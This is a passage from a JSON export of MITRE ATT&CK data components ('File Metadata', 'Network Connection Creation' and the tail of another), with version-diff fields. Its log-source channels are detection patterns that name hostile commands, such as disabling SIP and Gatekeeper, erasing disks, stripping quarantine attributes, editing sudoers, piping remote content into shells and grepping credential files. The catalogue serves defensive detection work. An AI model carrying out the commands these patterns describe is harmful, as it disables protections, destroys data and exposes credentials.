                            "name": "m365:office",
                            "channel": "Execution of unsigned macro from template"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Automated forwarding or file sync initiated by a logic app"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Search-Mailbox, Get-MessageTrace, eDiscovery requests"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-Mailbox, New-InboxRule"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-Mailbox, Set-MailboxPolicy, Set-TrustedLocation"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Interpreter exec with suspicious arguments as above"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd + process_events"
                        },
                        {
                            "name": "macos:syslog",
                            "channel": "system.log"
                        },
                        {
                            "name": "macos:syslog",
                            "channel": "/var/log/system.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dsconfigad or dscl with create or append options for AD-bound users"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl unload, kill, or pkill commands affecting daemons or background services"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of security-agent detection or enumeration commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of chflags hidden or SetFile -a V"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "defaults read -g AppleLocale, systemsetup -gettimezone"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "profiles install -type=configuration"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'eventMessage contains \"loginwindow\" or \"pfctl\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec or sudo usage with NOPASSWD context or echo modifying sudoers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of /usr/bin/security add-trusted-cert or keychain modifications to System.keychain"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "nohup, disown, or osascript execution patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of 'profiles install -type=configuration'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem:com.apple.Terminal"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "base64 or curl processes chained within short execution window"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Invocation of /usr/bin/defaults write or /usr/bin/plutil modifying plist keys"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "chmod command with arguments including '+s', 'u+s', or numeric values 4000\u20136777"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "command includes dscl . delete or sysadminctl --deleteUser"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DS daemon log entries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "diskutil eraseDisk / asr restore with destructive flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "pfctl -d, socketfilterfw --setglobalstate off, or modifications to com.apple.alf"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "pwpolicy|PasswordPolicy"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Command line contains smbutil view //, mount_smbfs //"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log messages related to disk enumeration context or Terminal session"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "defaults write com.apple.system.logging or logd manipulation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process calling security find-certificate, export, or import"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of log show, fs_usage, or cat targeting system.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of launchctl load/unload/start commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "base64 -d or osascript invoked on staged file"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "diskutil partitionDisk or eraseVolume with partition scheme modifications"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "grep/cat on files matching credential patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "diskutil eraseDisk/zeroDisk or asr restore with destructive flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "spctl --master-disable, csrutil disable, or defaults write to disable Gatekeeper"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: at, job runner"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of dscl . create with IsHidden=1"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'processImagePath contains \"zip\" OR \"base64\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "xattr utility execution with -w or -p flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of 'security', 'cat', or 'grep' commands accessing credential storage"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl load or boot-time plist registration"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dscl -create"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "kextload execution from Terminal or suspicious paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "xattr -d com.apple.quarantine or similar removal commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Security framework operations including keychain access, cryptographic operations, and certificate validation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of chflags hidden or setfile -a V"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:spawn, process:exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "csrutil disable"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log show --predicate 'process == <utility>'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of launchctl with setenv or bootout targeting TCC.db or AppleScript under Finder context"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "command execution triggered by emond (e.g., shell, curl, python)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Set or unset HIST* variables in shell environment"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "defaults read -g AppleLocale or systemsetup -gettimezone"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl load/unload or plist file modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dscl . -create"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of commands like `ls -l@`, `xattr -l`, or custom tools interacting with resource forks"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of osascript, sh, bash, zsh, installer, open"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "CLI command"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Policy Update"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "ip ssh pubkey-chain"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "erase flash:, erase startup-config, format disk"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "CLI command logs"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "cmd: cmd=show clock detail"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands to load, copy, or replace system images (e.g., 'copy tftp flash', 'boot system')"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "None"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands like 'show running-config', 'copy running-config', or 'export config'"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of CLI commands altering crypto parameters (e.g., 'crypto key generate rsa modulus 512')"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "format flash:, format disk, reformat commands"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "erase flash:, erase nvram:, format disk"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "command logs"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "command logging"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Interface commands"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of privileged commands such as 'copy tftp flash', 'boot system', or 'debug memory'"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands disabling crypto hardware acceleration (e.g., 'no crypto engine enable')"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "shell command"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Commands like 'no logging' or equivalents that disable session history"
                        },
                        {
                            "name": "networkdevice:cli",
                            "channel": "Execution of commands such as 'copy tftp flash', 'boot system <image>', 'reload'"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "PKI export or certificate manipulation commands"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing 'boot system tftp' or modification of startup-config pointing to external TFTP servers"
                        },
                        {
                            "name": "networkdevice:Firewall",
                            "channel": "Audit trail or CLI/API access indicating commands like no access-list, delete rule-set, clear config"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Command Audit / Configuration Change"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "eventlog"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command_exec"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command-exec: CLI commands containing \"show clock\", \"show clock detail\", \"show timezone\" executed by suspicious user/source"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "cmd='show aaa*' OR 'show running-config | include password|aaa' OR 'show aaa common-criteria policy all'"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "CLI command audit"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "system boot logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "exec command='monitor capture'"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "no logging buffered, no aaa new-model, disable firewall"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "interactive shell logging"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command sequence: erase \u2192 format \u2192 reload"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "CLI Command Logging"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "CLI Command Audit"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "command audit"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Privilege-level command execution"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Detected CLI command to export key material"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "reload command issued"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "syslog facility LOCAL7 or trap messages"
                        },
                        {
                            "name": "saas:PRMetadata",
                            "channel": "Commit message or branch name contains encoded strings or payload indicators"
                        },
                        {
                            "name": "vpxd.log",
                            "channel": "VM inventory queries and configuration enumeration through vCenter API calls"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Office-Alerts",
                            "channel": "Unexpected DLL or component loaded at Office startup"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Office-Alerts",
                            "channel": "Office application warning or alert on macro execution from template"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Office/OutlookAddinMonitor",
                            "channel": "Outlook loading add-in via unexpected load path or non-default profile context"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Get-ADTrust|GetAllTrustRelationships"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=4103, 4104, 4105, 4106"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of Microsoft script to enumerate custom forms in Outlook mailbox"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "CommandLine=copy-item or robocopy from UNC path"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "PowerShell launched from outlook.exe or triggered without user invocation"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of PowerShell script to enumerate or remove malicious Home Page folder config"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Exchange Cmdlets"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "CmdletName: Get-Recipient, Get-User"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of 'Get-WmiObject Win32_Product' or similar PowerShell cmdlets"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "Execution of PowerShell without -NoProfile flag"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=4101"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4103, 4104, 4105, 4106"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 19:47:16.123000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"android:logcat\", \"channel\": \"Command 'pm list packages' executed by app sandbox or child proc\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"auditd:EXECVE\", \"channel\": \"execve of script/interpreter (bash, python, node) with suspicious encoded or non-printable content\"}, \"root['x_mitre_log_sources'][21]\": {\"name\": \"auditd:EXECVE\", \"channel\": \"execve of curl,wget,bash,sh,python with piped or remote content\"}, \"root['x_mitre_log_sources'][22]\": {\"name\": \"auditd:EXECVE\", \"channel\": \"execve, kill, ptrace, insmod, rmmod targeting security processes\"}, \"root['x_mitre_log_sources'][103]\": {\"name\": \"esxi:shell\", \"channel\": \"esxcli system syslog config set/reload, services.sh restart/stop\"}, \"root['x_mitre_log_sources'][230]\": {\"name\": \"macos:unifiedlog\", \"channel\": \"Execution of osascript, sh, bash, zsh, installer, open\"}, \"root['x_mitre_log_sources'][231]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase\"}, \"root['x_mitre_log_sources'][232]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 18:33:47.956000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0059",
                            "external_id": "DC0059"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Metadata",
                    "description": "contextual information about a file, including attributes such as the file's name, size, type, content (e.g., signatures, headers, media), user/owner, permissions, timestamps, and other related properties. File metadata provides insights into a file's characteristics and can be used to detect malicious activity, unauthorized modifications, or other anomalies. Examples: \n\n- File Ownership and Permissions: Checking the owner and permissions of a critical configuration file like /etc/passwd on Linux or C:\\Windows\\System32\\config\\SAM on Windows.\n- Timestamps: Analyzing the creation, modification, and access timestamps of a file.\n- File Content and Signatures: Extracting the headers of an executable file to verify its signature or detect packing/obfuscation.\n- File Attributes: Analyzing attributes like hidden, system, or read-only flags in Windows.\n- File Hashes: Generating MD5, SHA-1, or SHA-256 hashes of files to compare against threat intelligence feeds.\n- File Location: Monitoring files located in unusual directories or paths, such as temporary or user folders.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "stat and lstat syscall results on files, including inode and permission info"
                        },
                        {
                            "name": "AndroidLogs:Framework",
                            "channel": "BroadcastReceiver registration for android.intent.action.BOOT_COMPLETED by previously unseen or recently installed apps"
                        },
                        {
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "chmod or chown of hook files indicating privilege escalation or execution permission change"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "file path matches exclusion directories"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "file path modifications on critical system directories (/etc, /usr/bin, /usr/sbin, /var, /opt)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Inotify watch creation or auditctl changes on /etc/cron* or /lib/systemd/system/"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file write after sleep delay"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, setxattr, lsetxattr, fsetxattr)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "setuid or setgid bit changes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, lchown, setxattr, lsetxattr, fsetxattr, removexattr, lremovexattr, fremovexattr)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "setxattr or getxattr system call"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod, chown, setxattr, or file writes to /etc/ssl/* or /usr/local/share/ca-certificates/*"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "Unexpected container volume unmount + file deletion"
                        },
                        {
                            "name": "EDR:detection",
                            "channel": "App reputation telemetry"
                        },
                        {
                            "name": "EDR:file",
                            "channel": "File Metadata Inspection (Low String Entropy, Missing PDB)"
                        },
                        {
                            "name": "EDR:file",
                            "channel": "File Metadata Analysis (PE overlays, entropy)"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "host daemon events related to file or VM permission changes"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "Datastore file hidden or renamed unexpectedly"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Upload of file to datastore"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Storage access and file ops"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMware kernel events for file system permission modifications"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Datastore modification events"
                        },
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "/var/log/install.log"
                        },
                        {
                            "name": "fs:filesystem",
                            "channel": "Binary file hash changes outside of update/patch cycles"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "file system events indicating permission or attribute changes"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "filesystem monitoring of exec/open"
                        },
                        {
                            "name": "fwupd:logs",
                            "channel": "Firmware updates applied or failed"
                        },
                        {
                            "name": "gatekeeper/quarantine database",
                            "channel": "LaunchServices quarantine"
                        },
                        {
                            "name": "journald:package",
                            "channel": "dpkg/apt or yum/dnf transaction logs (install/update of build tools)"
                        },
                        {
                            "name": "journald:package",
                            "channel": "dpkg/apt/yum/dnf transaction logs; vendor updaters in systemd journals"
                        },
                        {
                            "name": "journald:package",
                            "channel": "dpkg/apt install, remove, upgrade events"
                        },
                        {
                            "name": "journald:package",
                            "channel": "yum/dnf install or update transactions"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "event-based"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events, hash"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "hash, elf_info, file_metadata"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "elf_info, hash, yara_matches"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Read headers and detect MIME type mismatch"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events.path"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Filesystem modifications to trusted paths"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Write or modify .desktop file in XDG autostart path"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "hash, rpm_packages, deb_packages, file_events"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Discrepancies in _VBA_PROJECT p-code vs source code extracted with oletools/pcodedmp"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "application or system execution logs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "file permission modification events in kernel messages"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kernel messages related to file system permission changes and security violations"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_file_rename_t or es_event_file_write_t"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_authentication"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "code_signing, file_metadata"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "mach_o_info, file_metadata"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "softwareupdated/homebrew/install logs, pkginstalld events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "AMFI or Gatekeeper signature/notarization failures for newly installed dev components"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Detection of altered _VBA_PROJECT or PerformanceCache streams"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem:syspolicyd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File metadata updated with UF_HIDDEN flag"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Code signature validation fails or is absent post-binary modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Code signing verification failures or bypassed trust decisions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of new LaunchAgent or LoginItem plist files in ~/Library/LaunchAgents/"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "filesystem events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "xattr -d com.apple.quarantine or similar attribute removal commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Gatekeeper quarantine policy decision anomalies recorded in com.apple.LaunchServices.QuarantineEventsV2"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "pkginstalld/softwareupdated/Homebrew install transactions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "AMFI/Gatekeeper code signature or notarization failures"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "kernel extension and system extension logs related to file system security violations or SIP bypass attempts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected application binary modifications or altered signing status"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "extended attribute write or modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "New certificate trust settings added by unexpected process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.lsd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "installer or system_installd 'PackageKit: install succeeded/failed' with non-notarized or unknown signer"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Gatekeeper/AMFI 'code signature invalid' / 'not notarized' messages"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation or modification with com.apple.ResourceFork extended attribute"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "OS version query results inconsistent with expected or approved version list"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Observed File Transfers"
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "BSM audit events for file permission modifications"
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "BSM audit events for file permission, ownership, and attribute modifications with user context"
                        },
                        {
                            "name": "saas:RepoEvents",
                            "channel": "New file added or modified in PR targeting CI/CD or build config (e.g., `gitlab-ci.yml`, `build.gradle`, `pom.xml`, `.github/workflows/*.yml`)"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Invalid/Unsigned image when developer tool launches newly installed binaries"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Unsigned or invalid image for newly installed/updated binaries"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Code integrity violations in boot-start drivers or firmware"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "CodeIntegrity reports 'Invalid image hash' or 'Unsigned image' for new/updated binaries"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
                            "channel": "SmartScreen or ASR blocks on newly downloaded installer/updater"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4656, 4658"
                        },
                        {
                            "name": "WinEventLog:Setup",
                            "channel": "MSI/Product install, repair or update events"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=15"
                        },
                        {
                            "name": "WinEventLog:Windows Defender",
                            "channel": "Operational log"
                        },
                        {
                            "name": "WinEventLog:Windows Defender",
                            "channel": "Operational"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:33:47.956000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"auditd:SYSCALL\", \"channel\": \"stat and lstat syscall results on files, including inode and permission info\"}, \"root['x_mitre_log_sources'][1]\": {\"name\": \"AndroidLogs:Framework\", \"channel\": \"BroadcastReceiver registration for android.intent.action.BOOT_COMPLETED by previously unseen or recently installed apps\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-04-23 18:37:33.992000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0082",
                            "external_id": "DC0082"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Network Connection Creation",
                    "description": "The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.\n\n*Data Collection Measures:*\n\n- Windows:\n    - Event ID 5156 \u2013 Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.\n- Linux/macOS:\n    - Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.\n    - AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.\n    - Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.\n- Cloud & Network Infrastructure:\n    - AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.\n    - Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.\n- Endpoint Detection & Response (EDR):\n    - Detect anomalous network activity such as new C2 connections or data exfiltration attempts.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "NSM:Flow",
                            "channel": "log entries indicating network connection initiation on macOS"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execs of chromium, google-chrome, firefox, libreoffice with http(s) in cmdline"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect/sendto"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open or connect syscalls on /tmp/ssh-* or $SSH_AUTH_SOCK"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect with TLS context by unexpected process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/bind: New bind() to a previously closed port shortly after the sequence."
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "sendto/connect"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "outbound connections"
                        },
                        {
                            "name": "auditd:SYSCALL",
